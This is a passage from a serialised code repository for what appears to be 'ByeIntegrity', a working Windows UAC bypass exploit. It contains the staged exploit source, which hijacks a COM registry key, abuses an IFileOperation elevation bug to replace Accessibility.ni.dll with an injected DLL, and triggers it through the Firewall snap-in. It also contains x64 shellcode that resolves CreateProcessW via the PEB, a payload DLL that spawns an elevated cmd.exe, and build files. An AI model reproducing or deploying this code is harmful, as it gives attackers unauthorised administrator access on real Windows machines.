failed. HRESULT: 0x\" << std::hex << result << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\n\tCreateElevatedCopyObject(&fileOperation);\n\tif (!fileOperation)\n\t{\n\t\tCoUninitialize();\n\t\treturn EXIT_FAILURE;\n\t}\n\n\t/*\n\t *\tEND STAGE 3\n\t */\n\n\t /*\n\t *\tSTAGE 4\n\t *\tCreate a registry key that allows us to bypass the shfusion.dll restriction.\n\t *\tOnly do this if the \"desktop.ini\" exists in the folder.\n\t */\n\n\tif (!PathFileExistsW(fusionIni.c_str()))\n\t\tgoto DoAttackDirect;\n\n\tif ((status = RegCreateKeyExW(\n\t\tHKEY_CURRENT_USER, L\"SOFTWARE\\\\Classes\\\\CLSID\\\\{1D2680C9-0E2A-469d-B787-065558BC7D43}\", 0, nullptr,\n\t\tREG_OPTION_NON_VOLATILE, KEY_CREATE_SUB_KEY | KEY_SET_VALUE, nullptr, &userKey, &openResult)))\n\t{\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\tstd::cout << \"RegCreateKeyExW() (0) failed. Error \" << status << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\tif ((status = RegSetValueExW(userKey, nullptr, 0, REG_SZ, reinterpret_cast(L\"\"), sizeof(L\"\"))))\n\t{\n\t\tfileOperation->Release();\n\t\tRegCloseKey(userKey);\n\t\tCoUninitialize();\n\t\tstd::cout << \"RegSetValueExW() (0) failed. Error \" << status << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\tif ((status = RegCreateKeyExW(userKey, L\"Server\", 0, nullptr, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, nullptr,\n\t\t&userKey,\n\t\t&openResult)))\n\t{\n\t\tfileOperation->Release();\n\t\tRegCloseKey(userKey);\n\t\tCoUninitialize();\n\t\tstd::cout << \"RegCreateKeyExW() (1) failed. Error \" << status << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\tif ((status = RegSetValueExW(userKey, nullptr, 0, REG_SZ, reinterpret_cast(L\"\"), sizeof(L\"\"))))\n\t{\n\t\tfileOperation->Release();\n\t\tRegCloseKey(userKey);\n\t\tCoUninitialize();\n\t\tstd::cout << \"RegSetValueExW() (1) failed. Error \" << status << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\n\tRegCloseKey(userKey);\n\n\t/*\n\t *\tEND STAGE 4\n\t */\n\n\t /*\n\t *\tBEGIN STAGE 5\n\t *\tForce copy new Desktop.ini into assembly folder to disable shfusion.dll via IFileOperation bug.\n\t */\n\n\tCreateDirectoryW(L\"byeinteg_files\", nullptr);\n\n\tCloseHandle(CreateFileW(L\"byeinteg_files\\\\Desktop.ini\", FILE_WRITE_ACCESS, 0, nullptr, CREATE_ALWAYS,\n\t\tFILE_ATTRIBUTE_NORMAL, nullptr));\n\texplorer = explorer.substr(0, explorer.find(L\"explorer.exe\"));\n\texplorer += L\"assembly\";\n\n\tresult = SHCreateItemFromParsingName(explorer.c_str(), nullptr, IID_IShellItem, reinterpret_cast(&assemblyFolder));\n\tif (FAILED(result))\n\t{\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\tstd::cout << \"SHCreateItemFromParsingName() (0) failed. HRESULT: 0x\" << std::hex << result << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\n\trequiredSize = static_cast(GetCurrentDirectoryW(0, nullptr));\n\tcurrentDirectory = new WCHAR[requiredSize + 27];\n\tGetCurrentDirectoryW(static_cast(requiredSize), currentDirectory);\n\twcscat_s(currentDirectory, requiredSize + 27, L\"\\\\byeinteg_files\\\\Desktop.ini\");\n\n\tresult = SHCreateItemFromParsingName(currentDirectory, nullptr, IID_IShellItem, reinterpret_cast(&dummyFile));\n\tdelete[] currentDirectory;\n\tif (FAILED(result))\n\t{\n\t\tassemblyFolder->Release();\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\tstd::cout << \"SHCreateItemFromParsingName() (1) failed. HRESULT: 0x\" << std::hex << result << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\n\tresult = fileOperation->SetOperationFlags(FOF_NOCONFIRMATION | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION | FOF_NOERRORUI);\n\tif (FAILED(result))\n\t{\n\t\tdummyFile->Release();\n\t\tassemblyFolder->Release();\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\tstd::cout << \"IFileOperation::SetOperationFlags() failed. HRESULT: 0x\" << std::hex << result << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\tresult = fileOperation->CopyItem(dummyFile, assemblyFolder, nullptr, nullptr);\n\tif (FAILED(result))\n\t{\n\t\tassemblyFolder->Release();\n\t\tdummyFile->Release();\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\tstd::cout << \"IFileOperation::CopyItem() failed. HRESULT: 0x\" << std::hex << result << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\tresult = fileOperation->PerformOperations();\n\tif (FAILED(result))\n\t{\n\t\tassemblyFolder->Release();\n\t\tdummyFile->Release();\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\tstd::cout << \"IFileOperation::PerformOperations() (0) failed. HRESULT: 0x\" << std::hex << result << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\n\tassemblyFolder->Release();\n\tdummyFile->Release();\n\n\t/*\n\t *\tEND STAGE 5\n\t */\n\n\t /*\n\t *\tBEGIN STAGE 6\n\t *\tUndo changes to the registry so we can browse the assembly folder completely normally.\n\t *\tAlso delete the dummy Desktop.ini we copied over there.\n\t */\n\n\tif ((status = RegCreateKeyExW(\n\t\tHKEY_CURRENT_USER, L\"SOFTWARE\\\\Classes\\\\CLSID\\\\{1D2680C9-0E2A-469d-B787-065558BC7D43}\", 0, nullptr,\n\t\tREG_OPTION_NON_VOLATILE, KEY_SET_VALUE, nullptr, &userKey, &openResult)))\n\t{\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\tstd::cout << \"RegCreateKeyExW() (2) failed. Error \" << status << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\tif ((status = RegDeleteKeyExW(userKey, L\"Server\", KEY_WOW64_64KEY, 0)))\n\t{\n\t\tRegCloseKey(userKey);\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\tstd::cout << \"RegDeleteKeyExW() (0) failed. Error \" << status << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\tRegCloseKey(userKey);\n\tif ((status = RegDeleteKeyExW(\n\t\tHKEY_CURRENT_USER, L\"SOFTWARE\\\\Classes\\\\CLSID\\\\{1D2680C9-0E2A-469d-B787-065558BC7D43}\", KEY_WOW64_64KEY, 0)))\n\t{\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\tstd::cout << \"RegDeleteKeyExW() (1) failed. Error \" << status << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\n\t// Launch the delete process\n\n\texplorer += L\"\\\\Desktop.ini\";\n\tlaunchCmd += explorer;\n\tif (!CreateProcessW(argv[0], const_cast(launchCmd.c_str()), nullptr, nullptr, FALSE, 0, nullptr, nullptr,\n\t\t&startupInfo, &processInfo))\n\t{\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\tstd::cout << \"CreateProcessW() (0) failed. Error: \" << GetLastError() << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\tWaitForSingleObject(processInfo.hProcess, INFINITE);\n\tGetExitCodeProcess(processInfo.hProcess, &exitCode);\n\tCloseHandle(processInfo.hThread);\n\tCloseHandle(processInfo.hProcess);\n\n\tif (exitCode)\n\t{\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\tstd::cout << \"The child process failed to delete the target file.\\n\";\n\t\treturn EXIT_FAILURE;\n\t}\n\n\t/*\n\t *\tEND STAGE 6\n\t */\n\n\t /*\n\t *\tSTAGE 7\n\t *\tDelete the original Accessibility.ni.dll file and move our inject.dll file with the correct name over there.\n\t */\n\nDoAttackDirect:\n\tresult = SHCreateItemFromParsingName(fullPath.c_str(), nullptr, IID_IShellItem,\n\t\treinterpret_cast(&existingFile));\n\tif (FAILED(result))\n\t{\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\tstd::cout << \"SHCreateItemFromParsingName() (2) failed. HRESULT: 0x\" << std::hex << result << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\tfullPath = fullPath.substr(0, fullPath.size() - std::wcslen(L\"Accessibility.ni.dll\"));\n\tresult = SHCreateItemFromParsingName(fullPath.c_str(), nullptr, IID_IShellItem, reinterpret_cast(&targetFolder));\n\tif (FAILED(result))\n\t{\n\t\texistingFile->Release();\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\tstd::cout << \"SHCreateItemFromParsingName() (3) failed. HRESULT: 0x\" << std::hex << result << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\n\trequiredSize = static_cast(GetCurrentDirectoryW(0, nullptr));\n\tcurrentDirectory = new WCHAR[requiredSize + 11];\n\tGetCurrentDirectoryW(static_cast(requiredSize), currentDirectory);\n\n\twcscat_s(currentDirectory, requiredSize + 11, L\"\\\\infect.dll\");\n\tresult = SHCreateItemFromParsingName(currentDirectory, nullptr, IID_IShellItem,\n\t\treinterpret_cast(&targetFile));\n\tif (FAILED(result))\n\t{\n\t\tdelete[] currentDirectory;\n\t\ttargetFolder->Release();\n\t\texistingFile->Release();\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\tstd::cout << \"SHCreateItemFromParsingName() (4) failed. HRESULT: 0x\" << std::hex << result << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\n\tdelete[] currentDirectory;\n\n\tresult = fileOperation->RenameItem(existingFile, L\"Accessibility.ni.dll.bak\", nullptr);\n\tif (FAILED(result))\n\t{\n\t\ttargetFile->Release();\n\t\ttargetFolder->Release();\n\t\texistingFile->Release();\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\tstd::cout << \"IFileOperation::RenameItem() failed. HRESULT: 0x\" << std::hex << result << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\tresult = fileOperation->MoveItem(targetFile, targetFolder, L\"Accessibility.ni.dll\", nullptr);\n\tif (FAILED(result))\n\t{\n\t\ttargetFile->Release();\n\t\ttargetFolder->Release();\n\t\texistingFile->Release();\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\tstd::cout << \"IFileOperation::MoveItem() failed. HRESULT: 0x\" << std::hex << result << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\tresult = fileOperation->PerformOperations();\n\tif (FAILED(result))\n\t{\n\t\ttargetFile->Release();\n\t\ttargetFolder->Release();\n\t\texistingFile->Release();\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\tstd::cout << \"IFileOperation::PerformOperations() (1) failed. HRESULT: 0x\" << std::hex << result << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\n\ttargetFile->Release();\n\ttargetFolder->Release();\n\texistingFile->Release();\n\tfileOperation->Release();\n\tCoUninitialize();\n\n\t/*\n\t *\tEND STAGE 7\n\t */\n\n\t /*\n\t *\tSTAGE 8\n\t *\tLaunch the Firewall Snap-in via WF.msc to execute the exploit and do the attack.\n\t *\tAlso delete infect.dll and the dummy Desktop.ini file.\n\t */\n\n\t /* Launch the launch process. This is for Windows 7, because it seems like messing with the PEB causes\n\t * ShellExecute(Ex) to run out of memory. Makes no sense at all but that's how it is. */\n\n\tDeleteFileW(L\"infect.dll\");\n\tDeleteFileW(L\"byeinteg_files\\\\Desktop.ini\");\n\tRemoveDirectoryW(L\"byeinteg_files\");\n\tif (!CreateProcessW(argv[0], const_cast(L\"launch\"), nullptr, nullptr, FALSE, 0, nullptr, nullptr,\n\t\t&startupInfo, &processInfo))\n\t{\n\t\tstd::cout << \"CreateProcessW() (1) Error: \" << GetLastError() << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\tWaitForSingleObject(processInfo.hProcess, INFINITE);\n\tGetExitCodeProcess(processInfo.hProcess, &exitCode);\n\tCloseHandle(processInfo.hProcess);\n\tCloseHandle(processInfo.hThread);\n\n\tif (exitCode)\n\t{\n\t\tstd::cout << \"The child process failed to launch mmc.exe\\n\";\n\t\treturn EXIT_FAILURE;\n\t}\n\n\t/*\n\t *\tEND STAGE 8\n\t */\n\n\t // Finally, we can print success and exit.\n\n\tSetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), 15);\n\n\tstd::cout << \"[+] \";\n\n\tSetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), 14);\n\n\tstd::cout << \"*** Exploit successful.\\n\\n\";\n\n\tSetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), 7);\n\n\treturn 0;\n}" }, { "path": "byeintegrity/shellcode.txt", "content": "cmp dl, 1\njne exitNow\npush rdi\nsub rsp, 224\nlea rax, qword ptr 112[rsp]\nmov rdi, rax\nxor eax, eax\nmov ecx, 104\nrep stosb\nmov dword ptr 112[rsp], 104\nlea rax, qword ptr 80[rsp]\nmov qword ptr [rsp+72], rax\nlea rax, qword ptr 112[rsp]\nmov qword ptr [rsp+64], rax\nmov qword ptr [rsp+56], 0\nmov qword ptr [rsp+48], 0\nmov dword ptr [rsp+40], 0\nmov dword ptr [rsp+32], 0\nxor r9d, r9d\nxor r8d, r8d\nxor edx, edx\nlea rcx, [rip + 0x41]\n\nmov rax, QWORD PTR gs:[0x30]\nadd rax, 0x60\nmov rax, [rax]\nadd rax, 0x18\nmov rax, [rax]\nmov rax, [rax + 0x10]\nmov rax, [rax]\nmov rax, [rax]\nmov rax, [rax + 0x30]\nxor r12, r12\nmov r12d, 0xdeadbeef \nadd rax, r12\t;now RAX has is the address of CreateProcessW\n\ncall rax\nadd rsp, 224\npop rdi\nexitNow:\nxor rax, rax\nmov al, 1\nret" }, { "path": "byeintegrity.sln", "content": "\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio Version 17\nVisualStudioVersion = 17.0.31903.59\nMinimumVisualStudioVersion = 10.0.40219.1\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"byeintegrity\", \"byeintegrity\\byeintegrity.vcxproj\", \"{E1F82946-041D-49F3-860B-7CF7EC2C9620}\"\nEndProject\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"AUXGen\", \"AUXGen\\AUXGen.vcxproj\", \"{B4192E53-737A-409E-96AB-7013F6863072}\"\nEndProject\nProject(\"{2150E333-8FDC-42A3-9474-1A3956D46DE8}\") = \"2021 Update\", \"2021 Update\", \"{FC0FB17B-8AB3-4A56-B1BC-A43C00F50A53}\"\nEndProject\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"ByeIntegrity2021\", \"ByeIntegrity2021\\ByeIntegrity2021.vcxproj\", \"{7CDC9C5F-6DEE-4D33-A8AD-610194B1A017}\"\nEndProject\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"payload\", \"payload\\payload.vcxproj\", \"{24A262C7-3655-44A2-AEC5-05D645194830}\"\nEndProject\nGlobal\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\n\t\tDebug|Any CPU = Debug|Any CPU\n\t\tDebug|x64 = Debug|x64\n\t\tDebug|x86 = Debug|x86\n\t\tRelease|Any CPU = Release|Any CPU\n\t\tRelease|x64 = Release|x64\n\t\tRelease|x86 = Release|x86\n\tEndGlobalSection\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\n\t\t{E1F82946-041D-49F3-860B-7CF7EC2C9620}.Debug|Any CPU.ActiveCfg = Debug|x64\n\t\t{E1F82946-041D-49F3-860B-7CF7EC2C9620}.Debug|Any CPU.Build.0 = Debug|x64\n\t\t{E1F82946-041D-49F3-860B-7CF7EC2C9620}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{E1F82946-041D-49F3-860B-7CF7EC2C9620}.Debug|x64.Build.0 = Debug|x64\n\t\t{E1F82946-041D-49F3-860B-7CF7EC2C9620}.Debug|x86.ActiveCfg = Debug|Win32\n\t\t{E1F82946-041D-49F3-860B-7CF7EC2C9620}.Debug|x86.Build.0 = Debug|Win32\n\t\t{E1F82946-041D-49F3-860B-7CF7EC2C9620}.Release|Any CPU.ActiveCfg = Release|x64\n\t\t{E1F82946-041D-49F3-860B-7CF7EC2C9620}.Release|Any CPU.Build.0 = Release|x64\n\t\t{E1F82946-041D-49F3-860B-7CF7EC2C9620}.Release|x64.ActiveCfg = Release|x64\n\t\t{E1F82946-041D-49F3-860B-7CF7EC2C9620}.Release|x64.Build.0 = Release|x64\n\t\t{E1F82946-041D-49F3-860B-7CF7EC2C9620}.Release|x86.ActiveCfg = Release|Win32\n\t\t{E1F82946-041D-49F3-860B-7CF7EC2C9620}.Release|x86.Build.0 = Release|Win32\n\t\t{B4192E53-737A-409E-96AB-7013F6863072}.Debug|Any CPU.ActiveCfg = Debug|x64\n\t\t{B4192E53-737A-409E-96AB-7013F6863072}.Debug|Any CPU.Build.0 = Debug|x64\n\t\t{B4192E53-737A-409E-96AB-7013F6863072}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{B4192E53-737A-409E-96AB-7013F6863072}.Debug|x64.Build.0 = Debug|x64\n\t\t{B4192E53-737A-409E-96AB-7013F6863072}.Debug|x86.ActiveCfg = Debug|Win32\n\t\t{B4192E53-737A-409E-96AB-7013F6863072}.Debug|x86.Build.0 = Debug|Win32\n\t\t{B4192E53-737A-409E-96AB-7013F6863072}.Release|Any CPU.ActiveCfg = Release|x64\n\t\t{B4192E53-737A-409E-96AB-7013F6863072}.Release|Any CPU.Build.0 = Release|x64\n\t\t{B4192E53-737A-409E-96AB-7013F6863072}.Release|x64.ActiveCfg = Release|x64\n\t\t{B4192E53-737A-409E-96AB-7013F6863072}.Release|x64.Build.0 = Release|x64\n\t\t{B4192E53-737A-409E-96AB-7013F6863072}.Release|x86.ActiveCfg = Release|Win32\n\t\t{B4192E53-737A-409E-96AB-7013F6863072}.Release|x86.Build.0 = Release|Win32\n\t\t{7CDC9C5F-6DEE-4D33-A8AD-610194B1A017}.Debug|Any CPU.ActiveCfg = Debug|x64\n\t\t{7CDC9C5F-6DEE-4D33-A8AD-610194B1A017}.Debug|Any CPU.Build.0 = Debug|x64\n\t\t{7CDC9C5F-6DEE-4D33-A8AD-610194B1A017}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{7CDC9C5F-6DEE-4D33-A8AD-610194B1A017}.Debug|x64.Build.0 = Debug|x64\n\t\t{7CDC9C5F-6DEE-4D33-A8AD-610194B1A017}.Debug|x86.ActiveCfg = Debug|Win32\n\t\t{7CDC9C5F-6DEE-4D33-A8AD-610194B1A017}.Debug|x86.Build.0 = Debug|Win32\n\t\t{7CDC9C5F-6DEE-4D33-A8AD-610194B1A017}.Release|Any CPU.ActiveCfg = Release|x64\n\t\t{7CDC9C5F-6DEE-4D33-A8AD-610194B1A017}.Release|Any CPU.Build.0 = Release|x64\n\t\t{7CDC9C5F-6DEE-4D33-A8AD-610194B1A017}.Release|x64.ActiveCfg = Release|x64\n\t\t{7CDC9C5F-6DEE-4D33-A8AD-610194B1A017}.Release|x64.Build.0 = Release|x64\n\t\t{7CDC9C5F-6DEE-4D33-A8AD-610194B1A017}.Release|x86.ActiveCfg = Release|Win32\n\t\t{7CDC9C5F-6DEE-4D33-A8AD-610194B1A017}.Release|x86.Build.0 = Release|Win32\n\t\t{24A262C7-3655-44A2-AEC5-05D645194830}.Debug|Any CPU.ActiveCfg = Debug|x64\n\t\t{24A262C7-3655-44A2-AEC5-05D645194830}.Debug|Any CPU.Build.0 = Debug|x64\n\t\t{24A262C7-3655-44A2-AEC5-05D645194830}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{24A262C7-3655-44A2-AEC5-05D645194830}.Debug|x64.Build.0 = Debug|x64\n\t\t{24A262C7-3655-44A2-AEC5-05D645194830}.Debug|x86.ActiveCfg = Debug|Win32\n\t\t{24A262C7-3655-44A2-AEC5-05D645194830}.Debug|x86.Build.0 = Debug|Win32\n\t\t{24A262C7-3655-44A2-AEC5-05D645194830}.Release|Any CPU.ActiveCfg = Release|x64\n\t\t{24A262C7-3655-44A2-AEC5-05D645194830}.Release|Any CPU.Build.0 = Release|x64\n\t\t{24A262C7-3655-44A2-AEC5-05D645194830}.Release|x64.ActiveCfg = Release|x64\n\t\t{24A262C7-3655-44A2-AEC5-05D645194830}.Release|x64.Build.0 = Release|x64\n\t\t{24A262C7-3655-44A2-AEC5-05D645194830}.Release|x86.ActiveCfg = Release|Win32\n\t\t{24A262C7-3655-44A2-AEC5-05D645194830}.Release|x86.Build.0 = Release|Win32\n\tEndGlobalSection\n\tGlobalSection(SolutionProperties) = preSolution\n\t\tHideSolutionNode = FALSE\n\tEndGlobalSection\n\tGlobalSection(NestedProjects) = preSolution\n\t\t{B4192E53-737A-409E-96AB-7013F6863072} = {FC0FB17B-8AB3-4A56-B1BC-A43C00F50A53}\n\t\t{7CDC9C5F-6DEE-4D33-A8AD-610194B1A017} = {FC0FB17B-8AB3-4A56-B1BC-A43C00F50A53}\n\t\t{24A262C7-3655-44A2-AEC5-05D645194830} = {FC0FB17B-8AB3-4A56-B1BC-A43C00F50A53}\n\tEndGlobalSection\n\tGlobalSection(ExtensibilityGlobals) = postSolution\n\t\tSolutionGuid = {93AE96B8-1103-4400-8754-E4EC1D26AA01}\n\tEndGlobalSection\nEndGlobal\n" }, { "path": "payload/payload.cpp", "content": "#include \n#include \n#include \n\n__declspec(noreturn) void WINAPI DllMain(\n\tHMODULE,\n\tDWORD,\n\tLPVOID\n)\n{\n\tPWSTR system32Ptr;\n\tif (FAILED(SHGetKnownFolderPath(FOLDERID_System, 0, nullptr, &system32Ptr)))\n\t\tExitProcess(1);\n\n\tstd::wstring cmdPath{ system32Ptr };\n\tCoTaskMemFree(system32Ptr);\n\tcmdPath += L\"\\\\cmd.exe\";\n\n\tPROCESS_INFORMATION pi;\n\tSTARTUPINFOW si{};\n\tsi.cb = sizeof STARTUPINFO;\n\n\tif (!CreateProcessW(\n\t\tcmdPath.c_str(),\n\t\tnullptr,\n\t\tnullptr,\n\t\tnullptr,\n\t\tFALSE,\n\t\t0,\n\t\tnullptr,\n\t\tnullptr,\n\t\t&si,\n\t\t&pi\n\t))\n\t\tExitProcess(1);\n\n\tCloseHandle(pi.hThread);\n\tCloseHandle(pi.hProcess);\n\n\tExitProcess(0);\n}" }, { "path": "payload/payload.vcxproj", "content": "\n\n \n \n Debug\n Win32\n \n \n Release\n Win32\n \n \n Debug\n x64\n \n \n Release\n x64\n \n \n \n 16.0\n Win32Proj\n {24a262c7-3655-44a2-aec5-05d645194830}\n payload\n 10.0\n \n \n \n DynamicLibrary\n true\n v143\n Unicode\n \n \n DynamicLibrary\n false\n v143\n true\n Unicode\n \n \n DynamicLibrary\n true\n v143\n Unicode\n \n \n DynamicLibrary\n false\n v143\n true\n Unicode\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n true\n \n \n false\n \n \n true\n \n \n false\n \n \n \n Level3\n true\n WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n \n \n Console\n true\n \n \n \n \n Level3\n true\n true\n true\n WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n \n \n Console\n true\n true\n true\n \n \n \n \n Level3\n true\n _DEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n \n \n Console\n true\n \n \n \n \n Level3\n true\n true\n true\n NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n \n \n Console\n true\n true\n true\n \n \n \n \n \n \n \n \n" }, { "path": "payload/payload.vcxproj.filters", "content": "\n\n \n \n \n" } ]